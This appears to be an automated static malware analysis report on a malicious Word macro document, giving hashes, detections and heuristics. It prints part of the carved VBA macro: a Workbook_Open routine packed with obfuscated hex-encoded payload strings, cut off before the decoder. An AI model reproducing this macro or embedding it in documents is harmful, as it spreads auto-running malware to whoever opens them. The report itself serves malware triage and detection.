Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e8f52e9d279f9bcb…

MALICIOUS

Office (OLE)

108.0 KB Created: 2018-03-01 05:56:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 928cf0b83fc5858cf94e29bbb553c2d2 SHA-1: aed17cf9f4c6af3fca617750d4c782e36db6fc08 SHA-256: e8f52e9d279f9bcbf95a6b4df9e1fdee7d582fb6e37a3861d5b62e13ea9a8772
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file contains VBA macros, including a Workbook_Open macro, which is a common technique for executing malicious code upon opening. The critical heuristic firing for Shell() call in VBA indicates that the macro likely attempts to execute an external command or download a payload. The ClamAV detection further confirms its malicious nature. The presence of a 'macros.bas' file suggests the macro code itself is stored in a separate module.

Heuristics 7

  • ClamAV: Xls.Malware.Cwsp-6735643-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16419 bytes
SHA-256: de12dab77dcdb784188f68663592cbf46637efa093ed7943c6901b5e4bcb34ec
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 58 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

Sub Workbook_Open()
Dim N_T As String
N_T = "995D585D935D5D755D9C714A375D5D4B5D845D5D1E5D5D5D8384374B5D5D7746355D7C65475D6680455D5D3B8D785D385D205D571F5C995D64422D92727A40424832554F82225D3B525D8F5D57285D5D705D373D455D859A5D5D5D575D5D4F5D5D6363845D955D5D3A5D27315D2B3864932083272321595D5D3F"
Dim OFY_EY As String
OFY_EY = "2C5D635D5D395D5D5D7F325D5D5C2178437B865D5D5D975D5D5D5F285D525D5D5D555D5D5D5D7537735D7E458A5D1F5D34906A5D6A725D5D5D908E5D5D5D5D5D2638905D5D475D8F915D822B365D7D5D5D5D425D5D5D96645D32755D5D855D385D3C6F76535D5D5D5D835D5D5D5B315D5D385D5D2D5D5D5D3732"
Dim QPA_YPH As String
QPA_YPH = "5A5D5D725D5D2C5D5D5D24642B5D1E5D80245D625D5D6A5D925D2C5D7C5D5D5D5D5A435D3A5D22275D755D7D5D9A5D8F41305B5D5D5D255D9C2B9A63472A234C5D3B5D5D808F5D425D5D1E5D32325D5D5D5D5D5D5D5D524D912C545D5D5D6F5D5DCD5D2D5D46375D265D305D87895D245B9D7A5D5D3E3A5D515D"
Dim QH_KOY As String
QH_KOY = "5D5D29315D5D765D26995D5D5D5D5D2A406B275D6A5D5D8B5D5D5D5D8B525D6B49575D5D8D7C2E5D5D7D5D5D31274B2D8A5D5D565D5D855D5D5D5D485D651F4451735D5D745D5D5D2A894C615D385D9B7B5D5D5D335D8F5D2D5D5D978964607C9C5D5D70555D5D5D5D49535D425D5D5D5B5D28833B5D637E645D"
Dim WE_EK As String
WE_EK = "349D5D435D5D67904A83635D2B1E5D5D745D8F4E4D5A5D5D265D72375D5D2A5D905D5D985D2D5D5D5D3D8D97855D90275D51918A5D335D5D5D5D3A475D4D5D56768C4F6340697E6449505D2D5D3F748D6E6997745D5D5D7A24225D5D5D8354553E5D854B5D725D4B5E5D985D2BEB5D5D635D5D5D5D5D5D5C3B5D"
Dim VMX_KK As String
VMX_KK = "5D715D5D545D1F7A254181425D717C4A5D715D5D37635D875D5D5D85915D5D5D375D57625D975D4E5D5D5D2C8277775D5D455D2C5D375D51325D5D92525D5D87985D5D979A2E5D5D5D3B5D392B375D215D5D985D3E5D5D8345654E5D65295D5D84728E5D5D8C255D875D5D5D5D5D4E5D5D5D485D5D5D355D8D92"
Dim CUP_ED As String
CUP_ED = "5E305D4F975D6A5D5D5D5D795D5D71278A5D967A6E6E5D5D58875D915D5D5D325D5D6E755D5D313A5D5D5D5D49715D615D5D6C4730415D5D5A5D2D3C5D5D845D5D7A1E5D5D7C5D5D795D6F785D5D5D6F5D5D5D5D5D8D7E5D8C5D225D5D5D5D5D9B5D5D215D89235D5D5B8F5D955D2D595D5D409D7E5D8D5D5D94"
Dim LZ_CZ As String
LZ_CZ = "5D5D7B43285D90295D5D6B72855D5D3B5D5D5D2B5D5D5D4E5D5D375D5D5D2142399A4F628E36845D225D3D5D9D5D5D5D5D5D5D5D3A8752315D4B855D5D5D6F865946575D5D5D5D5D26305D5D3E5D995D315D8E255D653B5D605D5D6238735D5D74815D5D5D5D485D5D7F3F8F5D9B645D425D5C5D5D3F5D5D5D22"
Dim XF_BIU As String
XF_BIU = "885D5D5D29775D5D5D1E385D925D6E435D5D5D89433E4935315D535D4B7A5D5D64635D91825D5D415D5D5D41257477559B5D855D975D95C35D34415D5D4F275D734D3E5D5D445D5D5D815D5B5D2A5D5D5D945D5D5D4D5D5D5D5D1E5D5D835D4456775D5D5D235D4A5D5D94655C3A5D975D5D975D4B1F955D5A8B"
Dim A_VU As String
A_VU = "41777A78965D685D5D5D535D5F482B5D725D865D885D475D654A5D655D82785D5D4A738E5D5D5D48205D5D715D205D5D5D5D965D874F5D7A3B548E489C5D5D955D5D917332925D5D5D4E5D5D485D3B9A5D486F5B5D5C50655D5D8961964455215A3F645D7D5D5D37567A2D5D5D8D5D2A1F715D445D5D52415D5D"
Dim D_N As String
D_N = "34885D7A5D7E445D5D5D45635D425D5D405D5D5D7C5F435D2F618F5D41235D485D5D695D98815D5D4A537649785D5D36701E675D545F295D552C6D5D375D5D5D84385D93865D3D345D5D465D5D4A8B5D765D415D245D965D5D5D8A325D7C5D5D5D5D5D445D8C76475D5D5D5D5D5B5D5D5A5D275D5D7E456E5D5D"
Dim J_WS As String
J_WS = "3959294C5D3F5D52525D5D4A5D7F7B5D5D5D5D505D289B5D5D82365D725D713A3B935D945A5D275D6D5D355D5D735D5D8E2E5D5D5D5D845D5D254A5D5D925D885D6C5D5D5D5D5D4C96836C38615D5D89625D5D5D45573F655D7422335D304C245D5D2F3A5D5D5D225D5D885D5D5D5D35614D5D5D5D5D4564905D"
Dim GL_CX As String
GL_CX = "7E5D5D365D703D325D7B5D6C6B7F3D5D21565D785D5D5D5D385D8C5D945D7A4F5A878A7535845D4F86855D5D5D5D5D955D5E5D285D645D565D5D455D5D5D4E5D825D5D535D93465D5D5D225D5D5D715D39964F5D448E5D5D51285D5D6D5D845D837E2B5D5D5D615D4686355D5D205D7D5D5D5D5D5D8F8E5D826B"
Dim IE_YT As String
IE_YT = "895D205D5D3C805C55985D507A526D5D5D77495E4F993F5D9B3A5D5D5D5D59905D57445D585D4B5D755D5D5D965D80345D345D423A5D2F2E5D8D905D655D5D5D79338A5D3C
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.